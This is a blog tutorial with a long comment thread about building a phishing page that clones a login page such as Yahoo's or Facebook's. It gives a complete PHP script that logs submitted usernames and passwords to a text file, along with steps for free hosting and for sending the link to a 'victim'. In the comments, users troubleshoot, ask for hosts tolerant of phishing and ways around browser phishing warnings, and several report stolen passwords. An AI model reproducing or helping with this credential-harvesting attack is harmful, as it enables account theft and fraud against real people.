How to Make a Phisher/Fake Page For Any Website
1. First open the website in a browser for which you want to create a phishing page . Now right click in an empty space and select view source , copy all the contents to a note pad and save it as something.html
example :yahoo.html
2. Now open Yahoo.html (something.html) in a notepad .Now search for the string
"action = https.." and change the address to login.php and change method = " Post" to "GET" Finally save it
"action = https.." and change the address to login.php and change method = " Post" to "GET" Finally save it
3. Now we have to create login.php .For this open notepad , copy/paste the following code in it and save it as login.php
<?php
header ('Location: http://yahoo.com');
$handle = fopen("log.txt", "a");
foreach($_GET as $variable => $value) {
fwrite($handle, $variable);
fwrite($handle, "=");
fwrite($handle, $value);
fwrite($handle, "\r\n");
}
fwrite($handle, "\r\n");
fclose($handle);
exit;
?>
Note :- By default the victim will be redirected to yahoo.com once he clicks login ,If you want you can change the address, you can do it by changing the www.yahoo.com to any address you desire
4.Now create an account in Free web hosting sites, which supports php like , T35.com or 000webhost.com
5. Now upload all the two files which we created Yahoo.html , login.php
6. Now send the Yahoo.html link to the victim , once he enters the information and logins in , He will be redirected to the website which we did in step three
7. Now to see the victims password login to your hosting account, there you 'll see new file log.txt , open it to see the victims user-id and password
7. Now to see the victims password login to your hosting account, there you 'll see new file log.txt , open it to see the victims user-id and password
Hope you enjoyed this tutorial ,If you have any doubts please feel free to post a comment
I dint get the last part!
REPLYCan you explain how to change file permissions to 777
Can you tell me how to change file permissions to 777
REPLY@VJ
they are chmod setting "777 " means read write execute
I made the three files and uploaded them all to my t35 site... but whenever i go thru and test it- nothing appears in the log. i've set the perms to 777, the login.php is exactly the same -the yahoo part... any idea on what i'm doing wrong?
REPLY@Anonymous
please send the login.php link to the victim once he enters the info such as user id and password , and logins in he will be redirected to yahoo.com
and all the login details will be stored in log.txt
Exactly followed all the steps...The "log.txt" still showing blank.
REPLYHelp me out plz
Just a question..is it possible to find out who made a site like this ??
REPLYI want to ask mister... when i upload the .html file in t35.com it said that "File blablabla.html is too big. This file will not be uploaded."
REPLYhow can i fix it?
Hi Mister.. i want to ask why when im upload the .html file in t35.com ,it say that "File blblabla.html is too big. This file will not be uploaded."
REPLYhow could i fix it?? please help...
Soory for my bad english.. :))
@Jansen Kusuma
If you have problems with t35.com you can use 000webhost.com
Oh... I will try it tommorow.. :D
REPLYand i want to ask somethin again.. why when i upload the login.php and log.txt file , it show login.php.txt and log.txt.txt??
sorry for my disturbing question..
hope you want to explain.. :))
mister.. i can't make an active account in 000webhost.com..
REPLYit always say "System administrator will review your details and activate your account in 24 hours." when i open my cpanel
@Anonymous
Use these sites 110mb.com ripway.com
I can't upload log.txt to ripway.com! And how do I change the perms to 777?
REPLY@Puffer
Use 110mb.com
not even a single comment saying "It Worked" :\ well many says dat log.txt doesnt appear soo was just wondering how that works? how the file get created by itself in 11mb.com account or any other for dat matter?
REPLY@Mr. Riddler
actually people here are lazy they don't comment when it works
it works 100 % its a php script that captures all the data into a log file
If Ur still confused !!! just watch the video version of it
http://hackhaholic.blogspot.com/2011/07/hack-facebook-account-using-fake-login.html
hei
REPLYcould you please explain how can i make fake login page for msn. because i cant find "action = https.." in msn source codes.
thnx
Hey man, the links are broken, mind uploading them to another mirror? Also, the comment above me regarding the msn source code also described a problem I have encountered. Thanks.
REPLYhi this is alex.. can anyone tell me some other free web hosting sites which allow phishing.. ripway, t35 and etc don't allow it.. plz help..
REPLY@Anonymous
Use ooowebhost.com
$value) {
REPLYfwrite($handle, $variable);
fwrite($handle, "=");
fwrite($handle, $value);
fwrite($handle, "\r\n");
}
fwrite($handle, "\r\n");
fclose($handle);
exit;
?>
error on line 1 what can i do?
@Anonymous
There's no PHP opening Tag add <? or <?PHP
hey man , i used ripway but my account has been suspended due to security and hacking purposes..wtf
REPLY@Anonymous
Use 000webhost.com
in 000webhost.com say's==> I want to host my own domain what should i write ???
REPLYwhat is location in login.php
REPLYhow to send ???i using ooowebhost
REPLYhey it worked for me u can see it at chalgando.co.cc
REPLYi had done all the procedure but whwn ilog in from spam site it always say id or password not matches
REPLYhey john,
REPLYi have made everything and i made a test with an email and psswd but the file log.txt that i ve created still empty so where is the problem ????
i ve everything as u said in the articles...
w8ing ur answer ASAP
thank u
M.M
any one can explain the process of uploading the files and process of getting the password... i have made the 2 files but confused about uploading process and how can i get the password. thnks
REPLYiasdani
how to do it on 000webhost.com bro help please....thnx for your time and attention
REPLYhow can i send html link to victim?????
REPLYcan i use drivehq.com......
REPLYOk.. I have done everything. uploaded on drive hq.. but what link I'm suppose to send to Victim.. where this fake link is generated.. Please ans this question evn it sounds stupid..
REPLYHow can i get the password of a cpanel? Some one help
REPLYHi John,
REPLYI followed your instructions in modifying the HTML file of the mail.yahoo.com page, and used your login.php exactly. I've set up an account on my3gb.com, and have the website up and running fine.
My issues lie with getting the actual username and password to write to the text file. Do I need to upload a blank text file in the same directory as my index.html?
I'm not really sure what to modify to make the writing process work. So far I've tried uploading the 2 files (index.html and login.php) and when that didn't work I uploaded a blank text file called "log.txt" in the same directory as login.php. However nothing writes to the text file.
I've had experience with C++ and I'm not just pulling your leg with this... I actually want to get it working and will definitely post here if it ends up successful!
Thanks in advance.
Hey everyone, by making a few changes I was able to get this to work!
REPLYThe only problem I'm facing now is that my3gb.com has blocked my account. This happened within hours of me creating the website, so I'm assuming they're pretty diligent about checking their sites...
Does anyone know any webhosts that aren't very diligent with this?
I made all the information that u wrote and I uploaded them to the sight and changed what I have to change
REPLYbut when I wanna check it on myself .. I open the Facebook.html but nothin' appears or a webhostin' company appears
what's wron' with this???????
i am not abel to upload files ....... it is saying error .. why??
REPLY@Pete Smith
Try x10hosting
When victim am logging in so i am the (login.php) is getting open and i am not receiving any file such as log.txt
REPLY5gbfree.com is also usefull
REPLYHey John,
REPLYI have followed the same steps wat you have mentioned in the tread & for hosting i'm using DriveHQ free hosting site, But whn i tried myself & enter the yahooid nd password in the site, i get the login.php code in the website :( & i'm not getting any log.txt file
so could you pls help me
@ anyone
REPLYi get the user name but no password. help please this is what i get.
user=llllllllllllllll
passwrd=
cookielength=0
hash_passwrd=2573479e9729c483e24d32e6d8104be0a1700d10
Hey John ! Thanks for your easy to follow tutorial, it helped a lot.
REPLYI have a question, it can sounds stupid but well, how do you upload a file to 000webhost.com ?
Thanks :)
It doesnt work!!!! i did everything. then i used a fake facebook id to hack my own account and i got the file 'log.txt' in my web hosting account (x10) and my password and username showed up. but wen i sent it to the 'victim' I got a different txt page that had GET'randomid' and 'access denied' along with more encoded stuff in it. :@
REPLYwhat now?
the 'victim' wont open it again obviously... -_-
please? its sort of life and death.
REPLYjohn
REPLYHi ,can you do that for hotmail ? page source doesn't have action=http
thanks.
its works....:))
REPLYyeap.. it really works. thanks :)
REPLYI've done all the steps carefully and correctly but still not able to see "log.txt"
REPLYHelp plz
REPLYnikhil
REPLYi made account on 000webshot.com, but can any one tell me how to upload the both file to that websites
Hello-
REPLYSo I used 000webhost.com to upload the files. I uploaded the .php and .html files to create a fake Facebook page. However, when I view the page, it does not show me a Facebook site. Instead, it gives me an error such as this one: http://tx.netii.net/login.php
These are the files I uploaded: http://tx.netii.net/
How do I fix this please??!
how can i change the permission of files
REPLYit is not redirecting to facebook
REPLYhiya john my names sarah and im from englad i dont know if you still use this site or if you are still reading these comments i would love you too email me if you could find time to do so as i have followed all your instructions and i cannot get facebook to come up when i press send link only gmail and yahoo i have a really good reason for wanting to do this and if you could help me in any wasy id be very gratefull as it concerns my 14 yr old daughter thank for you time and my email address is sarahreilly2010@live.co.uk thankyou and please help me stop this i would of put my name only it wouldnt let me as you can already see my names sarah x
REPLYhiii john
REPLYThanks for your sharing!
REPLYi have uploaded it to 000webhost but i dont no what to do after that
REPLYhow do you do this with twitter
REPLYIs there any way of redirecting the username and password to an email address instead of it been stored in the password.txt
REPLYJ
i got it working, thanks :)
REPLYhi bro.....plz tel me the fake page link how it luks like???plz plz
REPLYhey john....the user is notified that it was fishing. how to get rid of that ???
REPLYHi bro.... When i type email and password in fake page... it open Login.php file as text.... whats going wrong... help please
REPLYhow to hide log.txt ; every one can see it
REPLYEverything works fine.. Except i think there is some problem with the login.php file. The data is stored in the log.txt file when i checked it it showed 275KB file size for log.txt.
REPLYHowever the only problem is when i open the log.txt file nothing it shows nothing inside. Totally blank file. Can u please check and see if the value for email and password is stored and shown in the log .txt file. I am nt so gud with PHP. The only problem is it didnt show the content of log.txt file.
Everything works fine.. Except i think there is some problem with the login.php file. The data is stored in the log.txt file when i checked it . it showed 275KB file size for log.txt.
REPLYHowever the only problem is when i open the log.txt file it shows nothing inside. Totally blank file. Can u please check and see if the value for email and password is stored and shown in the log .txt file. I am nt so gud with PHP. The only problem is it didnt show the content of log.txt file.
may i ask how to redirect this php file than to real facebook page what i need to write
REPLY$value) {
fwrite($handle, $variable);
fwrite($handle, "=");
fwrite($handle, $value);
fwrite($handle, "\r\n");
}
fwrite($handle, "\r\n");
fclose($handle);
where do i upload the files ? and where to get the link (phiser)
REPLY@xin wei tan
Upload the files to webhosting site
Woooooooo it Worked for me....Thanks dude
REPLYhelo frnd ... i tried everything as u said and a log.txt file created in my ftp account...but when i chk that ...there is no record inside...tried many number of times...but same prob exist...can u pls help me...thank u :) rahul
REPLYOH MY GLOB
REPLYI was skeptical at first, but I tried it out.
And it worked!!
haha! YOu sir, deserve a medal.
:D Thanks!
Actually i am being redirected to the file login.php if i use any fake email....
REPLYCan uhelp me??
Cant find action=...
REPLYhow do I send links to the victims
REPLY@Ernst Abenteuer
Send them Via Gchat or Facebook
i followed all the procedure, but i m not getting log, txt file plz help
REPLYhey vidhi... which web hosting did u use...?
REPLYhello admin.
REPLYi have a question, i have make all what you tell us to do , but when i test my site, (its gmail) and i click the button to log in, (using google chrome), it downloads the login.php, file, and it doesn t write in the logs.txt, i have read tutorial in all the pages, and its the same HELP!!!!!!
@jiloh55
check the file permission for login.php it should be set to 777
yes it worked now but the site got down after 20 minutes, but it helped to try only thanks
REPLYEverything works but the page is not compatible when viewed with FireFox or IE only Chrome, how can I fix that?
REPLYit would b better if u start makng videos bro!!
REPLY@Sai Charan
Ya we are planning to start new youtube channel where we will post various tutorials, but i am really busy right now we promise you that we will start the channel as soon as possible
but there are two addresses with starting 'action=https...' so should i change both addresses or any one of them..
REPLYive used 000webhost and done all the steps and my page works, however whenever someone puts there details in it doesn't send me them?
REPLYcouldn't anyone sugest what ive done wrong?
@jay son
check the file permissions of the files , It should be set to (777)
admin
REPLYis there any way that can write an .php file which use fopen , but not just "get" from facebook(login one more time? that is not good without error messages)...which uses "post" instead ,just try to post any wrong thing to show the error message in the redirect(maybe via javascript?).....?
Hi John,
REPLYThanks for this post.. It works well but took me time to figure it out.. :)
Anyways i have a question to ask you, what do we do to other sites that doesnt use or where we can't find "action" and "post" in their source code?
Do you have any idea of what to do in this kind of situation? An example is that of Hotmail and many others..
how do i subscribe to newer hacking tip
REPLY@frtn
Subscribe Us via Email
how to upload php file???
REPLYcan u make a tutorial to make a phishing page for any site with LAN
REPLYHello. sorry for posting as guest.
REPLYThis worked fine! However, on google chrome, it detects phishing and notifies "phishing ahead".
Please tell me how to bypass this?
where is the log.txt file?
REPLYHello John! Thank you! this works fine! I have a question, how can I make html or etc. script that login real facebook after press login and still save log.txt (I mean that it login real facebook after you press login at fake page and same time make log.txt) I see that your script changes to real facebook after pressing login at the fake facebook but it's maybe too visible. I want in to login real facebook automatically after trying the fake one.
REPLYThank you!
hey, i cant get past the first step. ive copied both the source for both yahoo and facebook just to try and put it on a notepad, but when i search for the words "action = https.." it sais there arent any words like that on the document. i even tried putting into MS word but still nothing. what am i doing wrong?
REPLYHow do I change the file permissions to 777?
REPLYI made a phishing website but after that when i click the link..Google chrome show an warning saying that the website is phished.What to do?I want to create a phishing page for an online game,but when i search the word 'action='.what should i do to clone other websites?
REPLYDid everythng correctly bt still the log.txt is blank plz help
REPLYYea I made a friend to type a fake username and pass on the site but the log.txt was empty after that help pls
REPLYEverything was OK. And I got one victim password, but after that my 000webhosting was suspend. Can you tell me if I try it on my own website, will it be same problem?
REPLYsome body help me with the uploading of the files to T35.com
REPLYits works.... :))
REPLYcan somebody please tell me where to find log.txt??
REPLYthanks!
When I make my page and try to login to yahoo it says Error: service temporarily unavailable. why is that?
REPLYUse the form below to comment. No spam please!!!